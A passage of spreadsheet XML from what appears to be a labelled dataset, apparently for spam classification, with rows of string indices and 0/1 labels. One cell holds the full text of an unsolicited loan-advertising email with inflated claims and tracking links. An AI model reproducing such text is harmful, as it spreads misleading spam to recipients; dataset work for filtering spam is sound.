      <c r="B6528" s="1" t="s">
        <v>6796</v>
      </c>
      <c r="C6528" s="1" t="s">
        <v>6797</v>
      </c>
      <c r="D6528" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6529" hidden="1">
      <c r="A6529" s="1">
        <v>6527.0</v>
      </c>
      <c r="B6529" s="1" t="s">
        <v>6051</v>
      </c>
      <c r="C6529" s="1" t="s">
        <v>8503</v>
      </c>
      <c r="D6529" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6530">
      <c r="A6530" s="1">
        <v>6528.0</v>
      </c>
      <c r="B6530" s="1" t="s">
        <v>8504</v>
      </c>
      <c r="C6530" s="1" t="s">
        <v>8505</v>
      </c>
      <c r="D6530" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6531" hidden="1">
      <c r="A6531" s="1">
        <v>6529.0</v>
      </c>
      <c r="B6531" s="1" t="s">
        <v>8506</v>
      </c>
      <c r="C6531" s="1" t="s">
        <v>8507</v>
      </c>
      <c r="D6531" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6532" hidden="1">
      <c r="A6532" s="1">
        <v>6530.0</v>
      </c>
      <c r="B6532" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C6532" s="1" t="s">
        <v>6598</v>
      </c>
      <c r="D6532" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6533" hidden="1">
      <c r="A6533" s="1">
        <v>6531.0</v>
      </c>
      <c r="B6533" s="1" t="s">
        <v>66</v>
      </c>
      <c r="C6533" s="1" t="s">
        <v>3560</v>
      </c>
      <c r="D6533" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6534" hidden="1">
      <c r="A6534" s="1">
        <v>6532.0</v>
      </c>
      <c r="B6534" s="1" t="s">
        <v>503</v>
      </c>
      <c r="C6534" s="1" t="s">
        <v>1050</v>
      </c>
      <c r="D6534" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6535" hidden="1">
      <c r="A6535" s="1">
        <v>6533.0</v>
      </c>
      <c r="B6535" s="1" t="s">
        <v>8058</v>
      </c>
      <c r="C6535" s="1" t="s">
        <v>8059</v>
      </c>
      <c r="D6535" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6536" hidden="1">
      <c r="A6536" s="1">
        <v>6534.0</v>
      </c>
      <c r="B6536" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C6536" s="1" t="s">
        <v>1579</v>
      </c>
      <c r="D6536" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6537">
      <c r="A6537" s="1">
        <v>6535.0</v>
      </c>
      <c r="B6537" s="1" t="s">
        <v>8508</v>
      </c>
      <c r="C6537" s="1" t="s">
        <v>8509</v>
      </c>
      <c r="D6537" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6538">
      <c r="A6538" s="1">
        <v>6536.0</v>
      </c>
      <c r="B6538" s="1" t="s">
        <v>8510</v>
      </c>
      <c r="C6538" s="1" t="s">
        <v>8511</v>
      </c>
      <c r="D6538" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6539">
      <c r="A6539" s="1">
        <v>6537.0</v>
      </c>
      <c r="B6539" s="1" t="s">
        <v>1876</v>
      </c>
      <c r="C6539" s="1" t="s">
        <v>8512</v>
      </c>
      <c r="D6539" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6540" hidden="1">
      <c r="A6540" s="1">
        <v>6538.0</v>
      </c>
      <c r="B6540" s="1" t="s">
        <v>8513</v>
      </c>
      <c r="C6540" s="1" t="s">
        <v>8514</v>
      </c>
      <c r="D6540" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6541" hidden="1">
      <c r="A6541" s="1">
        <v>6539.0</v>
      </c>
      <c r="B6541" s="1" t="s">
        <v>4682</v>
      </c>
      <c r="C6541" s="1" t="s">
        <v>4683</v>
      </c>
      <c r="D6541" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6542" hidden="1">
      <c r="A6542" s="1">
        <v>6540.0</v>
      </c>
      <c r="B6542" s="1" t="s">
        <v>745</v>
      </c>
      <c r="C6542" s="1" t="s">
        <v>8515</v>
      </c>
      <c r="D6542" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6543" hidden="1">
      <c r="A6543" s="1">
        <v>6541.0</v>
      </c>
      <c r="B6543" s="1" t="s">
        <v>2927</v>
      </c>
      <c r="C6543" s="1" t="s">
        <v>8516</v>
      </c>
      <c r="D6543" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6544" hidden="1">
      <c r="A6544" s="1">
        <v>6542.0</v>
      </c>
      <c r="B6544" s="1" t="s">
        <v>676</v>
      </c>
      <c r="C6544" s="1" t="s">
        <v>6935</v>
      </c>
      <c r="D6544" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6545" hidden="1">
      <c r="A6545" s="1">
        <v>6543.0</v>
      </c>
      <c r="B6545" s="1" t="s">
        <v>2468</v>
      </c>
      <c r="C6545" s="1" t="s">
        <v>2469</v>
      </c>
      <c r="D6545" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6546" hidden="1">
      <c r="A6546" s="1">
        <v>6544.0</v>
      </c>
      <c r="B6546" s="1" t="s">
        <v>2518</v>
      </c>
      <c r="C6546" s="1" t="s">
        <v>2519</v>
      </c>
      <c r="D6546" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6547" hidden="1">
      <c r="A6547" s="1">
        <v>6545.0</v>
      </c>
      <c r="B6547" s="1" t="s">
        <v>1644</v>
      </c>
      <c r="C6547" s="1" t="s">
        <v>1645</v>
      </c>
      <c r="D6547" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6548">
      <c r="A6548" s="1">
        <v>6546.0</v>
      </c>
      <c r="B6548" s="1" t="s">
        <v>8517</v>
      </c>
      <c r="C6548" s="1" t="s">
        <v>8518</v>
      </c>
      <c r="D6548" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6549" hidden="1">
      <c r="A6549" s="1">
        <v>6547.0</v>
      </c>
      <c r="B6549" s="1" t="s">
        <v>7964</v>
      </c>
      <c r="C6549" s="1" t="s">
        <v>7965</v>
      </c>
      <c r="D6549" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6550" hidden="1">
      <c r="A6550" s="1">
        <v>6548.0</v>
      </c>
      <c r="B6550" s="1" t="s">
        <v>7488</v>
      </c>
      <c r="C6550" s="1" t="s">
        <v>7489</v>
      </c>
      <c r="D6550" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6551">
      <c r="A6551" s="1">
        <v>6549.0</v>
      </c>
      <c r="B6551" s="1" t="s">
        <v>1664</v>
      </c>
      <c r="C6551" s="1" t="s">
        <v>8519</v>
      </c>
      <c r="D6551" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6552" hidden="1">
      <c r="A6552" s="1">
        <v>6550.0</v>
      </c>
      <c r="B6552" s="1" t="s">
        <v>6200</v>
      </c>
      <c r="C6552" s="1" t="s">
        <v>6201</v>
      </c>
      <c r="D6552" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6553">
      <c r="A6553" s="1">
        <v>6551.0</v>
      </c>
      <c r="B6553" s="1" t="s">
        <v>8520</v>
      </c>
      <c r="C6553" s="1" t="s">
        <v>8521</v>
      </c>
      <c r="D6553" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6554" hidden="1">
      <c r="A6554" s="1">
        <v>6552.0</v>
      </c>
      <c r="B6554" s="1" t="s">
        <v>8522</v>
      </c>
      <c r="C6554" s="1" t="s">
        <v>8523</v>
      </c>
      <c r="D6554" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6555" hidden="1">
      <c r="A6555" s="1">
        <v>6553.0</v>
      </c>
      <c r="B6555" s="1" t="s">
        <v>3217</v>
      </c>
      <c r="C6555" s="1" t="s">
        <v>5532</v>
      </c>
      <c r="D6555" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6556" hidden="1">
      <c r="A6556" s="1">
        <v>6554.0</v>
      </c>
      <c r="B6556" s="1" t="s">
        <v>8524</v>
      </c>
      <c r="C6556" s="1" t="s">
        <v>8525</v>
      </c>
      <c r="D6556" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6557">
      <c r="A6557" s="1">
        <v>6555.0</v>
      </c>
      <c r="B6557" s="1" t="s">
        <v>8526</v>
      </c>
      <c r="C6557" s="1" t="s">
        <v>8527</v>
      </c>
      <c r="D6557" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6558" hidden="1">
      <c r="A6558" s="1">
        <v>6556.0</v>
      </c>
      <c r="B6558" s="1" t="s">
        <v>533</v>
      </c>
      <c r="C6558" s="1" t="s">
        <v>7618</v>
      </c>
      <c r="D6558" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6559" hidden="1">
      <c r="A6559" s="1">
        <v>6557.0</v>
      </c>
      <c r="B6559" s="1" t="s">
        <v>1311</v>
      </c>
      <c r="C6559" s="1" t="s">
        <v>1312</v>
      </c>
      <c r="D6559" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6560">
      <c r="A6560" s="1">
        <v>6558.0</v>
      </c>
      <c r="B6560" s="1" t="s">
        <v>8528</v>
      </c>
      <c r="C6560" s="1" t="s">
        <v>8529</v>
      </c>
      <c r="D6560" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6561" hidden="1">
      <c r="A6561" s="1">
        <v>6559.0</v>
      </c>
      <c r="B6561" s="1" t="s">
        <v>8530</v>
      </c>
      <c r="C6561" s="1" t="s">
        <v>8531</v>
      </c>
      <c r="D6561" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6562" hidden="1">
      <c r="A6562" s="1">
        <v>6560.0</v>
      </c>
      <c r="B6562" s="1" t="s">
        <v>1897</v>
      </c>
      <c r="C6562" s="1" t="s">
        <v>1898</v>
      </c>
      <c r="D6562" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6563">
      <c r="A6563" s="1">
        <v>6561.0</v>
      </c>
      <c r="B6563" s="1" t="s">
        <v>8532</v>
      </c>
      <c r="C6563" s="1" t="s">
        <v>8533</v>
      </c>
      <c r="D6563" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6564" hidden="1">
      <c r="A6564" s="1">
        <v>6562.0</v>
      </c>
      <c r="B6564" s="1" t="s">
        <v>296</v>
      </c>
      <c r="C6564" s="1" t="s">
        <v>8534</v>
      </c>
      <c r="D6564" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6565" hidden="1">
      <c r="A6565" s="1">
        <v>6563.0</v>
      </c>
      <c r="B6565" s="1" t="s">
        <v>8259</v>
      </c>
      <c r="C6565" s="1" t="s">
        <v>8260</v>
      </c>
      <c r="D6565" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6566">
      <c r="A6566" s="1">
        <v>6564.0</v>
      </c>
      <c r="B6566" s="1" t="s">
        <v>1317</v>
      </c>
      <c r="C6566" s="3" t="str">
        <f>==================================================================
 Now you can have HUNDREDS of lenders compete for your loan!
 FACT: Interest Rates are at their lowest point in 40 years!
 You're eligible even with less than perfect credit !!
 	* Refinancing
 	* New Home Loans
 	* Debt Consolidation
 	* Debt Consultation
 	* Auto Loans
 	* Credit Cards
 	* Student Loans
 	* Second Mortgage
 	* Home Equity
 This Service is 100% FREE without any obligation.
 Visit Our Web Site at:  http://marketing-fashion.com/user0201/index.asp?Afft=QM3
 ====================================================================
 To Unsubscribe: http://marketing-fashion.com/light/watch.asp
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D6566" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6567" hidden="1">
      <c r="A6567" s="1">
        <v>6565.0</v>
      </c>
      <c r="B6567" s="1" t="s">
        <v>8204</v>
      </c>
      <c r="C6567" s="1" t="s">
        <v>8205</v>
      </c>
      <c r="D6567" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6568">
      <c r="A6568" s="1">
        <v>6566.0</v>
      </c>
      <c r="B6568" s="1" t="s">
        <v>8535</v>
      </c>
      <c r="C6568" s="1" t="s">
        <v>8536</v>
      </c>
      <c r="D6568" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6569">
      <c r="A6569" s="1">
        <v>6567.0</v>
      </c>
      <c r="B6569" s="1" t="s">
        <v>8537</v>
      </c>
      <c r="C6569" s="1" t="s">
        <v>8538</v>
      </c>
      <c r="D6569" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6570" hidden="1">
      <c r="A6570" s="1">
        <v>6568.0</v>
      </c>
      <c r="B6570" s="1" t="s">
        <v>2444</v>
      </c>
      <c r="C6570" s="1" t="s">
        <v>8539</v>
      </c>
      <c r="D6570" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6571" hidden="1">
      <c r="A6571" s="1">
        <v>6569.0</v>
      </c>
      <c r="B6571" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="C6571" s="1" t="s">
        <v>5711</v>
      </c>
      <c r="D6571" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6572" hidden="1">
      <c r="A6572" s="1">
        <v>6570.0</v>
      </c>
      <c r="B6572" s="1" t="s">
        <v>8540</v>
      </c>
      <c r="C6572" s="1" t="s">
        <v>8541</v>
      </c>
      <c r="D6572" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6573">
      <c r="A6573" s="1">
        <v>6571.0</v>
      </c>
      <c r="B6573" s="1" t="s">
        <v>8542</v>
      </c>
      <c r="C6573" s="1" t="s">
        <v>8543</v>
      </c>
      <c r="D6573" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6574" hidden="1">
      <c r="A6574" s="1">
        <v>6572.0</v>
      </c>
      <c r="B6574" s="1" t="s">
        <v>2475</v>
      </c>
      <c r="C6574" s="1" t="s">
        <v>8544</v>
      </c>
      <c r="D6574" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6575" hidden="1">
      <c r="A6575" s="1">
        <v>6573.0</v>
      </c>
      <c r="B6575" s="1" t="s">
        <v>663</v>
      </c>
      <c r="C6575" s="1" t="s">
        <v>8545</v>
      </c>
      <c r="D6575" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6576" hidden="1">
      <c r="A6576" s="1">
        <v>6574.0</v>
      </c>
      <c r="B6576" s="1" t="s">
        <v>3460</v>
      </c>
      <c r="C6576" s="1" t="s">
        <v>3461</v>
      </c>
      <c r="D6576" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6577">
      <c r="A6577" s="1">
        <v>6575.0</v>
      </c>
      <c r="B6577" s="1" t="s">
        <v>8546</v>
      </c>
      <c r="C6577" s="1" t="s">
        <v>8547</v>
      </c>
      <c r="D6577" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6578" hidden="1">
      <c r="A6578" s="1">
        <v>6576.0</v>
      </c>
      <c r="B6578" s="1" t="s">
        <v>8548</v>
      </c>
      <c r="C6578" s="1" t="s">
        <v>8549</v>
      </c>
      <c r="D6578" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6579" hidden="1">
      <c r="A6579" s="1">
        <v>6577.0</v>
      </c>
      <c r="B6579" s="1" t="s">
        <v>4999</v>
      </c>
      <c r="C6579" s="1" t="s">
        <v>5000</v>
      </c>
      <c r="D6579" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6580" hidden="1">
      <c r="A6580" s="1">
        <v>6578.0</v>
      </c>
      <c r="B6580" s="1" t="s">
        <v>786</v>
      </c>
      <c r="C6580" s="1" t="s">
        <v>8550</v>
      </c>
      <c r="D6580" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6581" hidden="1">
      <c r="A6581" s="1">
        <v>6579.0</v>
      </c>
      <c r="B6581" s="1" t="s">
        <v>93</v>
      </c>
      <c r="C6581" s="1" t="s">
        <v>5561</v>
      </c>
      <c r="D6581" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6582" hidden="1">
      <c r="A6582" s="1">
        <v>6580.0</v>
      </c>
      <c r="B6582" s="1" t="s">
        <v>5123</v>
      </c>
      <c r="C6582" s="4" t="s">
        <v>5124</v>
      </c>
      <c r="D6582" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6583">
      <c r="A6583" s="1">
        <v>6581.0</v>
      </c>
      <c r="B6583" s="1" t="s">
        <v>5066</v>
      </c>
      <c r="C6583" s="1" t="s">
        <v>5067</v>
      </c>
      <c r="D6583" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6584">
      <c r="A6584" s="1">
        <v>6582.0</v>
      </c>
      <c r="B6584" s="1" t="s">
        <v>8551</v>
      </c>
      <c r="C6584" s="1" t="s">
        <v>8552</v>
      </c>
      <c r="D6584" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6585">
      <c r="A6585" s="1">
        <v>6583.0</v>
      </c>
      <c r="B6585" s="1" t="s">
        <v>4250</v>
      </c>
      <c r="C6585" s="1" t="s">
        <v>8553</v>
      </c>
      <c r="D6585" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6586" hidden="1">
      <c r="A6586" s="1">
        <v>6584.0</v>
      </c>
      <c r="B6586" s="1" t="s">
        <v>655</v>
      </c>
      <c r="C6586" s="1" t="s">
        <v>8554</v>
      </c>
      <c r="D6586" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6587" hidden="1">
      <c r="A6587" s="1">
        <v>6585.0</v>
      </c>
      <c r="B6587" s="1" t="s">
        <v>814</v>
      </c>
      <c r="C6587" s="1" t="s">
        <v>8555</v>
      </c>
      <c r="D6587" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6588" hidden="1">
      <c r="A6588" s="1">
        <v>6586.0</v>
      </c>
      <c r="B6588" s="1" t="s">
        <v>8556</v>
      </c>
      <c r="C6588" s="1" t="s">
        <v>8557</v>
      </c>
      <c r="D6588" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6589">
      <c r="A6589" s="1">
        <v>6587.0</v>
      </c>
      <c r="B6589" s="1" t="s">
        <v>8558</v>
      </c>
      <c r="C6589" s="1" t="s">
        <v>8559</v>
      </c>
      <c r="D6589" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6590" hidden="1">
      <c r="A6590" s="1">
        <v>6588.0</v>
      </c>
      <c r="B6590" s="1" t="s">
        <v>3018</v>
      </c>
      <c r="C6590" s="1" t="s">
        <v>8560</v>
      </c>
      <c r="D6590" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6591" hidden="1">
      <c r="A6591" s="1">
        <v>6589.0</v>
      </c>
      <c r="B6591" s="1" t="s">
        <v>904</v>
      </c>
      <c r="C6591" s="1" t="s">
        <v>1565</v>
      </c>
      <c r="D6591" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6592" hidden="1">
      <c r="A6592" s="1">
        <v>6590.0</v>
      </c>
      <c r="B6592" s="1" t="s">
        <v>986</v>
      </c>
      <c r="C6592" s="1" t="s">
        <v>8561</v>
      </c>
      <c r="D6592" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6593" hidden="1">
      <c r="A6593" s="1">
        <v>6591.0</v>
      </c>
      <c r="B6593" s="1" t="s">
        <v>259</v>
      </c>
      <c r="C6593" s="1" t="s">
        <v>260</v>
      </c>
      <c r="D6593" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6594" hidden="1">
      <c r="A6594" s="1">
        <v>6592.0</v>
      </c>
      <c r="B6594" s="1" t="s">
        <v>4246</v>
      </c>
      <c r="C6594" s="1" t="s">
        <v>8562</v>
      </c>
      <c r="D6594" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6595" hidden="1">
      <c r="A6595" s="1">
        <v>6593.0</v>
      </c>
      <c r="B6595" s="1" t="s">
        <v>2715</v>
      </c>
      <c r="C6595" s="1" t="s">
        <v>2716</v>
      </c>
      <c r="D6595" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6596">
      <c r="A6596" s="1">
        <v>6594.0</v>
      </c>
      <c r="B6596" s="1" t="s">
        <v>8563</v>
      </c>
      <c r="C6596" s="1" t="s">
        <v>8564</v>
      </c>
      <c r="D6596" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6597" hidden="1">
      <c r="A6597" s="1">
        <v>6595.0</v>
      </c>
      <c r="B6597" s="1" t="s">
        <v>908</v>
      </c>
      <c r="C6597" s="1" t="s">
        <v>3804</v>
      </c>
      <c r="D6597" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6598" hidden="1">
      <c r="A6598" s="1">
        <v>6596.0</v>
      </c>
      <c r="B6598" s="1" t="s">
        <v>369</v>
      </c>
      <c r="C6598" s="1" t="s">
        <v>8565</v>
      </c>
      <c r="D6598" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6599">
      <c r="A6599" s="1">
        <v>6597.0</v>
      </c>
      <c r="B6599" s="1" t="s">
        <v>1057</v>
      </c>
      <c r="C6599" s="1" t="s">
        <v>1058</v>
      </c>
      <c r="D6599" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6600" hidden="1">
      <c r="A6600" s="1">
        <v>6598.0</v>
      </c>
      <c r="B6600" s="1" t="s">
        <v>8566</v>
      </c>
      <c r="C6600" s="1" t="s">
        <v>8567</v>
      </c>
      <c r="D6600" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6601" hidden="1">
      <c r="A6601" s="1">
        <v>6599.0</v>
      </c>
      <c r="B6601" s="1" t="s">
        <v>645</v>
      </c>
      <c r="C6601" s="1" t="s">
        <v>646</v>
      </c>
      <c r="D6601" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6602">
      <c r="A6602" s="1">
        <v>6600.0</v>
      </c>
      <c r="B6602" s="1" t="s">
        <v>8568</v>
      </c>
      <c r="C6602" s="1" t="s">
        <v>8569</v>
      </c>
      <c r="D6602" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6603" hidden="1">
      <c r="A6603" s="1">
        <v>6601.0</v>
      </c>
      <c r="B6603" s="1" t="s">
        <v>5420</v>
      </c>
      <c r="C6603" s="1" t="s">
        <v>5421</v>
      </c>
      <c r="D6603" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6604" hidden="1">
      <c r="A6604" s="1">
        <v>6602.0</v>
      </c>
      <c r="B6604" s="1" t="s">
        <v>8570</v>
      </c>
      <c r="C6604" s="1" t="s">
        <v>8571</v>
      </c>
      <c r="D6604" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6605" hidden="1">
      <c r="A6605" s="1">
        <v>6603.0</v>
      </c>
      <c r="B6605" s="1" t="s">
        <v>711</v>
      </c>
      <c r="C6605" s="1" t="s">
        <v>7348</v>
      </c>
      <c r="D6605" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6606">
      <c r="A6606" s="1">
        <v>6604.0</v>
      </c>
      <c r="B6606" s="1" t="s">
        <v>8572</v>
      </c>
      <c r="C6606" s="1" t="s">
        <v>8573</v>
      </c>
      <c r="D6606" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6607" hidden="1">
      <c r="A6607" s="1">
        <v>6605.0</v>
      </c>
      <c r="B6607" s="1" t="s">
        <v>2605</v>
      </c>
      <c r="C6607" s="1" t="s">
        <v>5068</v>
      </c>
      <c r="D6607" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6608" hidden="1">
      <c r="A6608" s="1">
        <v>6606.0</v>
      </c>
      <c r="B6608" s="1" t="s">
        <v>1689</v>
      </c>
      <c r="C6608" s="1" t="s">
        <v>8574</v>
      </c>
      <c r="D6608" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6609" hidden="1">
      <c r="A6609" s="1">
        <v>6607.0</v>
      </c>
      <c r="B6609" s="1" t="s">
        <v>8575</v>
      </c>
      <c r="C6609" s="1" t="s">
        <v>8576</v>
      </c>
      <c r="D6609" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6610" hidden="1">
      <c r="A6610" s="1">
        <v>6608.0</v>
      </c>
      <c r="B6610" s="1" t="s">
        <v>5127</v>
      </c>
      <c r="C6610" s="1" t="s">
        <v>5128</v>
      </c>
      <c r="D6610" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6611">
      <c r="A6611" s="1">
        <v>6609.0</v>
      </c>
      <c r="B6611" s="1" t="s">
        <v>3625</v>
      </c>
      <c r="C6611" s="1" t="s">
        <v>3626</v>
      </c>
      <c r="D6611" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6612" hidden="1">
      <c r="A6612" s="1">
        <v>6610.0</v>
      </c>
      <c r="B6612" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C6612" s="1" t="s">
        <v>8577</v>
      </c>
      <c r="D6612" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6613" hidden="1">
      <c r="A6613" s="1">
        <v>6611.0</v>
      </c>
      <c r="B6613" s="1" t="s">
        <v>2054</v>
      </c>
      <c r="C6613" s="1" t="s">
        <v>2055</v>
      </c>
      <c r="D6613" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6614" hidden="1">
      <c r="A6614" s="1">
        <v>6612.0</v>
      </c>
      <c r="B6614" s="1" t="s">
        <v>540</v>
      </c>
      <c r="C6614" s="1" t="s">
        <v>541</v>
      </c>
      <c r="D6614" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6615" hidden="1">
      <c r="A6615" s="1">
        <v>6613.0</v>
      </c>
      <c r="B6615" s="1" t="s">
        <v>747</v>
      </c>
      <c r="C6615" s="1" t="s">
        <v>8313</v>
      </c>
      <c r="D6615" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6616" hidden="1">
      <c r="A6616" s="1">
        <v>6614.0</v>
      </c>
      <c r="B6616" s="1" t="s">
        <v>3616</v>
      </c>
      <c r="C6616" s="1" t="s">
        <v>3617</v>
      </c>
      <c r="D6616" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6617">
      <c r="A6617" s="1">
        <v>6615.0</v>
      </c>
      <c r="B6617" s="1" t="s">
        <v>8578</v>
      </c>
      <c r="C6617" s="1" t="s">
        <v>8579</v>
      </c>
      <c r="D6617" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6618" hidden="1">
      <c r="A6618" s="1">
        <v>6616.0</v>
      </c>
      <c r="B6618" s="1" t="s">
        <v>533</v>
      </c>
      <c r="C6618" s="1" t="s">
        <v>7827</v>
      </c>
      <c r="D6618" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6619">
      <c r="A6619" s="1">
        <v>6617.0</v>
      </c>
      <c r="B6619" s="1" t="s">
        <v>8580</v>
      </c>
      <c r="C6619" s="1" t="s">
        <v>8581</v>
      </c>
      <c r="D6619" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6620" hidden="1">
      <c r="A6620" s="1">
        <v>6618.0</v>
      </c>
      <c r="B6620" s="1" t="s">
        <v>3611</v>
      </c>
      <c r="C6620" s="1" t="s">
        <v>3612</v>
      </c>
      <c r="D6620" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6621" hidden="1">
      <c r="A6621" s="1">
        <v>6619.0</v>
      </c>
      <c r="B6621" s="1" t="s">
        <v>7664</v>
      </c>
      <c r="C6621" s="1" t="s">
        <v>7665</v>
      </c>
      <c r="D6621" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6622" hidden="1">
      <c r="A6622" s="1">
        <v>6620.0</v>
      </c>
      <c r="B6622" s="1" t="s">
        <v>93</v>
      </c>
      <c r="C6622" s="1" t="s">
        <v>3086</v>
      </c>
      <c r="D6622" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6623">
      <c r="A6623" s="1">
        <v>6621.0</v>
      </c>
      <c r="B6623" s="1" t="s">
        <v>8582</v>
      </c>
      <c r="C6623" s="1" t="s">
        <v>8583</v>
      </c>
      <c r="D6623" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6624" hidden="1">
      <c r="A6624" s="1">
        <v>6622.0</v>
      </c>
      <c r="B6624" s="1" t="s">
        <v>8584</v>
      </c>
      <c r="C6624" s="1" t="s">
        <v>8585</v>
      </c>
      <c r="D6624" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6625" hidden="1">
      <c r="A6625" s="1">
        <v>6623.0</v>
      </c>
      <c r="B6625" s="1" t="s">
        <v>8284</v>
      </c>
      <c r="C6625" s="1" t="s">
        <v>8285</v>
      </c>
      <c r="D6625" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6626">
      <c r="A6626" s="1">
        <v>6624.0</v>
      </c>
      <c r="B6626" s="1" t="s">
        <v>3668</v>
      </c>
      <c r="C6626" s="1" t="s">
        <v>8586</v>
      </c>
      <c r="D6626" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6627">
      <c r="A6627" s="1">
        <v>6625.0</v>
      </c>
      <c r="B6627" s="1" t="s">
        <v>1457</v>
      </c>
      <c r="C6627" s="1" t="s">
        <v>1458</v>
      </c>
      <c r="D6627" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6628">
      <c r="A6628" s="1">
        <v>6626.0</v>
      </c>
      <c r="B6628" s="1" t="s">
        <v>8254</v>
      </c>
      <c r="C6628" s="1" t="s">
        <v>8255</v>
      </c>
      <c r="D6628" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6629" hidden="1">
      <c r="A6629" s="1">
        <v>6627.0</v>
      </c>
      <c r="B6629" s="1" t="s">
        <v>4863</v>
      </c>
      <c r="C6629" s="1" t="s">
        <v>7935</v>
      </c>
      <c r="D6629" s="1">
